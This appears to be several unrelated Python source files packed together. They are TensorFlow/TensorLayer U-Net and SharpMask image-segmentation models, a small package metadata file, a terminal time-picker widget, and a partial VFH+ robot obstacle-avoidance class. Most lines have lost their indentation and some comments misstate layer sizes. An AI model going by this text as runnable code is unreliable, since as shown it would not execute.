y_prob = tf.reshape(y_prob,[batch_size, data_shape[0],data_shape[1],2])
y_prob = tf.slice(y_prob,[0,0,0,1],[batch_size, data_shape[0],data_shape[1],1])
y_class = tf.reshape(y_class,[batch_size,nx,ny,1])
return network,y_class, y_prob
def model_VGG16_Unet(x, y_,fw, batch_size, data_shape, reuse=False, mean_file_name=None,is_train = True, network_scopename = "VGG16_Unet" ):
if mean_file_name!=None:
meanval = np.load(mean_file_name)
x = image_preprocess(x,meanval)
nx = data_shape[0]
ny = data_shape[1]
gamma_init=tf.random_normal_initializer(2., 0.1)
with tf.variable_scope(network_scopename, reuse=reuse):
tl.layers.set_name_reuse(reuse)
network_input = tl.layers.InputLayer(x, name='input')
""" conv1 """
conv1 = tl.layers.Conv2dLayer(network_input, shape = [3, 3, 3, 64],
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_1')
conv1 = tl.layers.Conv2dLayer(conv1, shape = [3, 3, 64, 64], # 64 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_2')
conv1 = tl.layers.BatchNormLayer(conv1, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn1')
pool1 = tl.layers.PoolLayer(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],padding='SAME',
pool = tf.nn.max_pool, name ='pool1') #outputsize: [H/2,W/2]
""" conv2 """
conv2 = tl.layers.Conv2dLayer(pool1, shape = [3, 3, 64, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_1')
conv2 = tl.layers.Conv2dLayer(conv2, shape = [3, 3, 128, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_2')
conv2 = tl.layers.BatchNormLayer(conv2, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn2')
pool2 = tl.layers.PoolLayer(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool2') #outputsize: [H/4,W/4]
""" conv3 """
conv3 = tl.layers.Conv2dLayer(pool2, shape = [3, 3, 128, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_1')
conv3 = tl.layers.Conv2dLayer(conv3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_2')
conv3 = tl.layers.Conv2dLayer(conv3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_3')
conv3 = tl.layers.BatchNormLayer(conv3, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn3')
pool3 = tl.layers.PoolLayer(conv3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool3') #outputsize: [H/8,W/8]
""" conv4 """
conv4 = tl.layers.Conv2dLayer(pool3, shape = [3, 3, 256, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_1')
conv4 = tl.layers.Conv2dLayer(conv4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_2')
conv4 = tl.layers.Conv2dLayer(conv4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_3')
conv4 = tl.layers.BatchNormLayer(conv4, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn4')
pool4 = tl.layers.PoolLayer(conv4, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool4') #outputsize: [H/16,W/16]
""" conv5 """
conv5 = tl.layers.Conv2dLayer(pool4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_1')
conv5 = tl.layers.Conv2dLayer(conv5, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_2')
conv5 = tl.layers.Conv2dLayer(conv5, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_3')
conv5 = tl.layers.BatchNormLayer(conv5, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn5')
        up4 = tl.layers.DeConv2d(conv5, 256, (3, 3), (nx // 8, ny // 8), (2, 2), name='deconv4')  # output spatial size must be integers
up4 = tl.layers.ConcatLayer([up4, conv4], 3, name='concat4')
conv4 = tl.layers.Conv2d(up4, 256, (3, 3), act=tf.nn.relu, name='uconv4_1')
conv4 = tl.layers.Conv2d(conv4, 256, (3, 3), act=tf.nn.relu, name='uconv4_2')
        up3 = tl.layers.DeConv2d(conv4, 128, (3, 3), (nx // 4, ny // 4), (2, 2), name='deconv3')
up3 = tl.layers.ConcatLayer([up3, conv3], 3, name='concat3')
conv3 = tl.layers.Conv2d(up3, 128, (3, 3), act=tf.nn.relu, name='uconv3_1')
conv3 = tl.layers.Conv2d(conv3, 128, (3, 3), act=tf.nn.relu, name='uconv3_2')
        up2 = tl.layers.DeConv2d(conv3, 64, (3, 3), (nx // 2, ny // 2), (2, 2), name='deconv2')
up2 = tl.layers.ConcatLayer([up2, conv2], 3, name='concat2')
conv2 = tl.layers.Conv2d(up2, 64, (3, 3), act=tf.nn.relu, name='uconv2_1')
conv2 = tl.layers.Conv2d(conv2, 64, (3, 3), act=tf.nn.relu, name='uconv2_2')
        up1 = tl.layers.DeConv2d(conv2, 32, (3, 3), (nx, ny), (2, 2), name='deconv1')
up1 = tl.layers.ConcatLayer([up1, conv1] , 3, name='concat1')
conv1 = tl.layers.Conv2d(up1, 64, (3, 3), act=tf.nn.relu, name='uconv1_1')
conv1 = tl.layers.Conv2d(conv1, 64, (3, 3), act=tf.nn.relu, name='uconv1_2')
network = tl.layers.Conv2d(conv1, 2, (1, 1), act=tf.nn.sigmoid, name='uconv1')
if is_train:
#================Groundtruth==========================
y_ = tf.reshape(y_,[batch_size*nx*ny,2])
fw = tf.reshape(fw,[batch_size*nx*ny])
y = network.outputs
y = tf.reshape(y,[batch_size*nx*ny,2])
y_prob = tf.nn.softmax(y)
y_class = tf.argmax(y_prob, 1)
y_class = tf.reshape(y_class,[batch_size,nx,ny,1])
cost = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y_prob),1),fw))
return network,cost,y_class
else:
y = network.outputs
y = tf.reshape(y,[nx*ny,2])
y_prob = tf.nn.softmax(y)
y_class = tf.argmax(y_prob, 1)
y_prob = tf.reshape(y_prob,[batch_size, data_shape[0],data_shape[1],2])
y_prob = tf.slice(y_prob,[0,0,0,1],[batch_size, data_shape[0],data_shape[1],1])
y_class = tf.reshape(y_class,[batch_size,nx,ny,1])
return network,y_class, y_prob
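# Illustrative usage sketch (added for clarity, not from the original source). The placeholder
# shapes are assumptions inferred from the reshape calls above (one-hot masks, per-pixel weights):
# x  = tf.placeholder(tf.float32, [batch_size, 512, 512, 3])   # input images
# y_ = tf.placeholder(tf.float32, [batch_size, 512, 512, 2])   # one-hot ground-truth masks
# fw = tf.placeholder(tf.float32, [batch_size, 512, 512])      # per-pixel loss weights
# net, cost, y_class = model_VGG16_Unet(x, y_, fw, batch_size, (512, 512), is_train=True)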
def model_VGG16_SharpMask(x, y_,fw, batch_size, data_shape, reuse=False, mean_file_name=None,is_train = True, network_scopename = "VGG16_SharpMask" ):
if mean_file_name!=None:
meanval = np.load(mean_file_name)
x = image_preprocess(x,meanval)
nx = data_shape[0]
ny = data_shape[1]
gamma_init=tf.random_normal_initializer(2., 0.1)
with tf.variable_scope(network_scopename, reuse=reuse):
tl.layers.set_name_reuse(reuse)
network_input = tl.layers.InputLayer(x, name='input')
""" conv1 """
conv1 = tl.layers.Conv2dLayer(network_input, shape = [3, 3, 3, 64],
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_1')
conv1 = tl.layers.Conv2dLayer(conv1, shape = [3, 3, 64, 64], # 64 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_2')
conv1 = tl.layers.BatchNormLayer(conv1, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn1')
pool1 = tl.layers.PoolLayer(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],padding='SAME',
pool = tf.nn.max_pool, name ='pool1') #outputsize: [H/2,W/2]
""" conv2 """
conv2 = tl.layers.Conv2dLayer(pool1, shape = [3, 3, 64, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_1')
conv2 = tl.layers.Conv2dLayer(conv2, shape = [3, 3, 128, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_2')
conv2 = tl.layers.BatchNormLayer(conv2, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn2')
pool2 = tl.layers.PoolLayer(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool2') #outputsize: [H/4,W/4]
""" conv3 """
conv3 = tl.layers.Conv2dLayer(pool2, shape = [3, 3, 128, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_1')
conv3 = tl.layers.Conv2dLayer(conv3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_2')
conv3 = tl.layers.Conv2dLayer(conv3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_3')
conv3 = tl.layers.BatchNormLayer(conv3, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn3')
pool3 = tl.layers.PoolLayer(conv3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool3') #outputsize: [H/8,W/8]
""" conv4 """
conv4 = tl.layers.Conv2dLayer(pool3, shape = [3, 3, 256, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_1')
conv4 = tl.layers.Conv2dLayer(conv4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_2')
conv4 = tl.layers.Conv2dLayer(conv4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_3')
conv4 = tl.layers.BatchNormLayer(conv4, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn4')
pool4 = tl.layers.PoolLayer(conv4, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool4') #outputsize: [H/16,W/16]
#============================================================================
conv5 = tl.layers.Conv2dLayer(pool4, shape = [1, 1, 512, 32], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5')
#==============refine 1=======================
conv4_refine = tl.layers.Conv2dLayer(pool4, shape = [3, 3, 512, 64], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='conv4_refine_1')
conv4_refine = tl.layers.Conv2dLayer(conv4_refine, shape = [3, 3, 64, 32], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='conv4_refine_2')
refine1_cmb = tl.layers.ConcatLayer([conv4_refine,conv5],
concat_dim = 3, name = 'refine1_cmb')
refine1 = tl.layers.Conv2dLayer(refine1_cmb, shape = [3, 3, 64, 16], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='refine1')
refine1 = tl.layers.UpSampling2dLayer(refine1,
size = [data_shape[0]//8,data_shape[1]//8], method =0,is_scale = False,name = 'refine1_up' ) # output:[H/8,W/8,16]
#==============refine 2=======================
conv3_refine = tl.layers.Conv2dLayer(pool3, shape = [3, 3, 256, 64], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='conv3_refine_1')
conv3_refine = tl.layers.Conv2dLayer(conv3_refine, shape = [3, 3, 64, 16], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='conv3_refine_2')
refine2_cmb = tl.layers.ConcatLayer([conv3_refine,refine1],
concat_dim = 3, name = 'refine2_cmb')# output:[H/8,W/8,32]
refine2 = tl.layers.Conv2dLayer(refine2_cmb, shape = [3, 3, 32, 8], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='refine2')
refine2 = tl.layers.UpSampling2dLayer(refine2,
size = [data_shape[0]//4,data_shape[1]//4], method =0,is_scale = False,name = 'refine2_up' )
#==============refine 3=======================
conv2_refine = tl.layers.Conv2dLayer(pool2, shape = [3, 3, 128, 64], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='conv2_refine_1')
conv2_refine = tl.layers.Conv2dLayer(conv2_refine, shape = [3, 3, 64, 8], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='conv2_refine_2')
refine3_cmb = tl.layers.ConcatLayer([conv2_refine,refine2],
concat_dim = 3, name = 'refine3_cmb')
refine3 = tl.layers.Conv2dLayer(refine3_cmb, shape = [3, 3, 16, 4], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='refine3')
refine3 = tl.layers.UpSampling2dLayer(refine3,
size = [data_shape[0]//2,data_shape[1]//2], method =0,is_scale = False,name = 'refine3_up' ) # output:[H/2,W/2,4]
#==============refine 4=======================
conv1_refine = tl.layers.Conv2dLayer(pool1, shape = [3, 3, 64, 64], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='conv1_refine_1')
conv1_refine = tl.layers.Conv2dLayer(conv1_refine, shape = [3, 3, 64, 4], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='conv1_refine_2')
refine4_cmb = tl.layers.ConcatLayer([conv1_refine,refine3],
                                                 concat_dim = 3, name = 'refine4_cmb')# output:[H/2,W/2,8]
refine4 = tl.layers.Conv2dLayer(refine4_cmb, shape = [3, 3, 8, 2], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='refine4')
refine4 = tl.layers.UpSampling2dLayer(refine4,
size = [data_shape[0],data_shape[1]], method =0,is_scale = False,name = 'refine4_up' )
network = refine4
if is_train:
#================Groundtruth==========================
y_ = tf.reshape(y_,[batch_size*nx*ny,2])
fw = tf.reshape(fw,[batch_size*nx*ny])
y = network.outputs
y = tf.reshape(y,[batch_size*nx*ny,2])
y_prob = tf.nn.softmax(y)
y_class = tf.argmax(y_prob, 1)
y_class = tf.reshape(y_class,[batch_size,nx,ny,1])
cost = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y_prob),1),fw))
return network,cost,y_class
else:
y = network.outputs
y = tf.reshape(y,[nx*ny,2])
y_prob = tf.nn.softmax(y)
y_class = tf.argmax(y_prob, 1)
y_prob = tf.reshape(y_prob,[batch_size, data_shape[0],data_shape[1],2])
y_prob = tf.slice(y_prob,[0,0,0,1],[batch_size, data_shape[0],data_shape[1],1])
y_class = tf.reshape(y_class,[batch_size,nx,ny,1])
return network,y_class, y_prob |
__project__ = "o3seespy"
__author__ = "Maxim Millen & Minjie Zhu"
__version__ = "3.1.0.18"
__license__ = "MIT with OpenSees License"
|
# -*- coding: utf-8 -*-
"""This module implements a time picker widget"""
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from datetime import datetime
from builtins import range
from asciimatics.event import KeyboardEvent, MouseEvent
from asciimatics.screen import Screen
from asciimatics.widgets.label import Label
from asciimatics.widgets.layout import Layout
from asciimatics.widgets.listbox import ListBox
from asciimatics.widgets.temppopup import _TempPopup
from asciimatics.widgets.widget import Widget
class _TimePickerPopup(_TempPopup):
"""
An internal Frame for editing the currently selected time.
"""
def __init__(self, parent):
"""
:param parent: The widget that spawned this pop-up.
"""
# Construct the Frame
location = parent.get_location()
super(_TimePickerPopup, self).__init__(parent.frame.screen,
parent,
location[0] - 1, location[1] - 2,
10 if parent.include_seconds else 7, 5)
# Build the widget to display the time selection.
self._hours = ListBox(3, [("{:02}".format(x), x) for x in range(24)], centre=True)
self._minutes = ListBox(3, [("{:02}".format(x), x) for x in range(60)], centre=True)
self._seconds = ListBox(3, [("{:02}".format(x), x) for x in range(60)], centre=True)
if self._parent.include_seconds:
layout = Layout([2, 1, 2, 1, 2], fill_frame=True)
else:
layout = Layout([2, 1, 2], fill_frame=True)
self.add_layout(layout)
layout.add_widget(self._hours, 0)
layout.add_widget(Label("\n:", height=3), 1)
layout.add_widget(self._minutes, 2)
if self._parent.include_seconds:
layout.add_widget(Label("\n:", height=3), 3)
layout.add_widget(self._seconds, 4)
self.fix()
# Set up the correct time.
self._hours.value = parent.value.hour
self._minutes.value = parent.value.minute
self._seconds.value = parent.value.second
def _on_close(self, cancelled):
if not cancelled:
self._parent.value = self._parent.value.replace(hour=self._hours.value,
minute=self._minutes.value,
second=self._seconds.value)
class TimePicker(Widget):
"""
A TimePicker widget allows you to pick a time from a compact, temporary, pop-up Frame.
"""
__slots__ = ["_label", "_on_change", "_value", "_child", "include_seconds"]
def __init__(self, label=None, name=None, seconds=False, on_change=None, **kwargs):
"""
:param label: An optional label for the widget.
:param name: The name for the widget.
:param seconds: Whether to include selection of seconds or not.
:param on_change: Optional function to call when the selected time changes.
Also see the common keyword arguments in :py:obj:`.Widget`.
"""
super(TimePicker, self).__init__(name, **kwargs)
self._label = label
self._on_change = on_change
self._value = datetime.now().time()
self._child = None
self.include_seconds = seconds
def update(self, frame_no):
self._draw_label()
        # This widget only ever needs to display the current selection - the separate Frame does all
# the clever stuff when it has the focus.
(colour, attr, background) = self._pick_colours("edit_text")
self._frame.canvas.print_at(
self._value.strftime("%H:%M:%S" if self.include_seconds else "%H:%M"),
self._x + self._offset,
self._y,
colour, attr, background)
def reset(self):
pass
def process_event(self, event):
if event is not None:
# Handle key or mouse selection events - e.g. click on widget or Enter.
if isinstance(event, KeyboardEvent):
if event.key_code in [Screen.ctrl("M"), Screen.ctrl("J"), ord(" ")]:
event = None
elif isinstance(event, MouseEvent):
if event.buttons != 0:
if self.is_mouse_over(event, include_label=False):
event = None
# Create the pop-up if needed
if event is None:
self._child = _TimePickerPopup(self)
self.frame.scene.add_effect(self._child)
return event
def required_height(self, offset, width):
return 1
@property
def value(self):
"""
The current selected time.
"""
return self._value
@value.setter
def value(self, new_value):
# Only trigger the notification after we've changed the value.
old_value = self._value
self._value = new_value
if old_value != self._value and self._on_change:
self._on_change()
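# Illustrative usage sketch (not part of the original module): like any asciimatics widget, a
# TimePicker is added to a Layout inside a Frame; the label and name below are example values.
# layout.add_widget(TimePicker("Time:", name="start_time", seconds=True))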
|
from itertools import islice, izip
import math
FAR_AWAY = 256.0 # A dummy far-away distance used instead of zeros in laser scans. [m]
class VFH:
'''
    VFH+ implementation. No long-term memory is used; only the obstacles in the last laser scan are taken into account.
The laser is expected to be mounted on the axis in the robot's facing direction.
Modeled after "VFH+: Reliable Obstacle Avoidance for Fast Mobile Robots", I. Ulrich and J. Borenstein.
'''
def __init__(self, laserFOV = math.radians(270), blockingDistance = 0.35, safetyDistance = 0.5, maxRange = 1.4, turnRadius = None, mu1 = 5, mu2 = 2, mu3 = 3, binSize = math.radians(5), verbose = False):
'''
Params:
laserFOV ... Field of view of the laser. [rad]
safetyDistance ... This is a minimal planned distance from obstacles. [m]
      maxRange ... Readings farther than this threshold are ignored. This makes it possible to use a laser pointing at the ground. [m]
turnRadius ... The maximal turning trajectory of the robot is approximated with a circle with this radius. If None, a holonomic robot is assumed. [m]
      mu1, mu2, mu3 ... Parameters of the cost function. mu1 is the weight of the difference between a candidate direction and the goal direction; mu2 is the weight of the difference between a candidate direction and the current steering direction; mu3 is the weight of the difference between a candidate direction and the previously selected direction. mu1 > mu2 + mu3 must hold. TODO: mu2 is currently not used.
binSize ... Angular width of the bins in the histograms. laserFOV should be divisible by binSize. [rad]
verbose ... If verbose is set to True, some debugging information may be printed.
'''
self.scan = None # Laser scan in meters, right side first
self.laserFOV = laserFOV
self.blockingDistance = blockingDistance
self.safetyDistance = safetyDistance
self.maxRange = maxRange
self.turnRadius = turnRadius
self.mu1 = mu1
self.mu2 = mu2
self.mu3 = mu3
self.binSize = binSize
self.verbose = verbose
def __bin(self, angle):
''' Find an index of a bin which the angle falls to. '''
return int( (angle + self.laserFOV / 2.0) / self.binSize)
def __angle(self, bin):
''' Find an angle corresponding to the given bin. '''
return bin * self.binSize + self.binSize / 2.0 - self.laserFOV / 2.0
def __obstDir(self, i):
''' Compute a direction to the obstacle from the scan index. '''
return self.laserFOV * i / (len(self.scan) - 1.0) - self.laserFOV / 2.0
def update(self, data):
scan = [ FAR_AWAY if x == 0 else x for x in data ]
self.scan = scan
def isBlocked(self):
'''Return True if there is an obstacle within self.safetyDistance in front of the robot.'''
if self.scan is None:
return True # better safe than sorry
print "Blocked cond", self.blockingDistance, min(self.scan)
return any( ( x < self.blockingDistance for x in self.scan ) )
def navigate(self, goalDir, prevDir = 0.0, extraObs = []):
''' Find a direction to the goal avoiding obstacles visible in the last scan.
Param:
goalDir ... A direction to the goal. [rad]
prevDir ... A previously selected steering direction. [rad]
extraObs ... A list of extra obstacles. An obstacle is specified in local polar coordinates as a pair (angle, distance) [(rad, m)].
Return:
Either a preferred direction [rad, counter-clockwise], or None.
None is returned whenever there is an obstacle very near or no direction seems reasonable.
'''
if self.scan is None:
print "No scan"
return None
if self.isBlocked():
print "Blocked"
return None
polarHistogram = self.__polarHistogram(extraObs)
if polarHistogram is None:
print "No polar histogram"
return None
binaryPolarHistogram = self.__binaryPolarHistogram(polarHistogram)
maskedPolarHistogram = self.__maskedPolarHistogram(binaryPolarHistogram)
openWindows = self.__openWindows(maskedPolarHistogram)
candidates = self.__candidates(openWindows, goalDir)
dir = self.__bestCandidate(candidates, goalDir, prevDir)
if self.verbose:
s = [ 'x' if x else ' ' for x in maskedPolarHistogram]
if dir is not None:
i = self.__bin(dir)
s = s[:i] + ['.'] + s[i:]
s = ''.join(s)
print "'" + s[::-1] + "'"
print "Dir", dir
return dir
def __polarHistogram(self, extraObs = []):
c2 = 1.0 # Certainty squared. We trust the laser, thus 1.0**2.
a = 0.5 #TODO: How should we set this parameter?
ws = 0.2 # TODO: ? [m]
b = (a - 1.0) * 4.0/ ( (ws-1.0) **2 )
self.__histogramThreshold = c2 * (a - b * (self.maxRange * 0.5)**2) #TODO: This is an ad-hoc unsupported decision. Note: It seems to work, though.
polarHistogram = [0.0] * (1 + self.__bin(self.laserFOV / 2.0))
obstacles = [ (beta, d) for (beta, d) in extraObs if d <= self.maxRange ]
for i in range(len(self.scan)):
d = self.scan[i] # distance [m]
if d > self.maxRange:
continue
beta = self.__obstDir(i) # direction to the obstacle [rad]
obstacles.append( (beta, d) )
for (beta, d) in obstacles:
m = c2 * (a - b * d**2) # cell magnitude
if d < self.blockingDistance: # we are within the safety distance from an obstacle
return None
ratio = self.safetyDistance / d
# if we are within the safetyDistance, asin is undefined => let's HACK
if ratio > 1.0:
ratio = 1.0
elif ratio < -1.0:
ratio = -1.0
gamma = math.asin(ratio) # enlargement angle [rad]
low = max(0, self.__bin( beta - gamma ))
high = min(len(polarHistogram), self.__bin( beta + gamma ))
for j in range(low, high):
polarHistogram[j] += m
return polarHistogram
def __binaryPolarHistogram(self, polarHistogram):
return [ x > self.__histogramThreshold for x in polarHistogram ] #NOTE: No hysteresis. (Unlike in the article)
def __maskedPolarHistogram(self, binaryPolarHistogram):
if self.turnRadius is None: # A holonomic robot.
return binaryPolarHistogram
else:
# !!!!!!
# Note: The implementation below differs from the one in The Article in that:
# a) This one uses polar coordinates.
# b) This one knows, that even an obstacle on the left can block turning to the right.
left = +self.laserFOV / 2.0
right = -self.laserFOV / 2.0
for i in xrange(len(self.scan)):
if self.scan[i] > self.maxRange:
continue
d2 = self.scan[i]**2
                beta = self.__obstDir(i) # An angle to the obstacle relative to the facing direction. [rad]
if beta > right: # Right-turning to this direction is not blocked yet.
gammaR = beta - (-math.pi) / 2 # Angle to the center of a right-turning trajectory ("right center").
dr2 = d2 + self.turnRadius**2 - 2 * self.scan[i] * self.turnRadius * math.cos(gammaR) # A squared distance of the obstacle from the right center
if dr2 < (self.turnRadius + self.safetyDistance)**2: # A right-blocking obstacle.
right = beta
if beta < left: # Left-turning to this direction is not blocked yet.
gammaL = beta - math.pi / 2 # Angle to the center of a left-turning trajectory ("left center").
dl2 = d2 + self.turnRadius**2 - 2 * self.scan[i] * self.turnRadius * math.cos(gammaL) # A squared distance of the obstacle from the left center.
if dl2 < (self.turnRadius + self.safetyDistance)**2: # A left-blocking obstacle.
left = beta
li = self.__bin(left)
ri = self.__bin(right)
return [ False if binaryPolarHistogram[i] == False and i >= ri and i <= li else True for i in xrange(len(binaryPolarHistogram)) ]
def __openWindows(self, maskedPolarHistogram):
openWindows = []
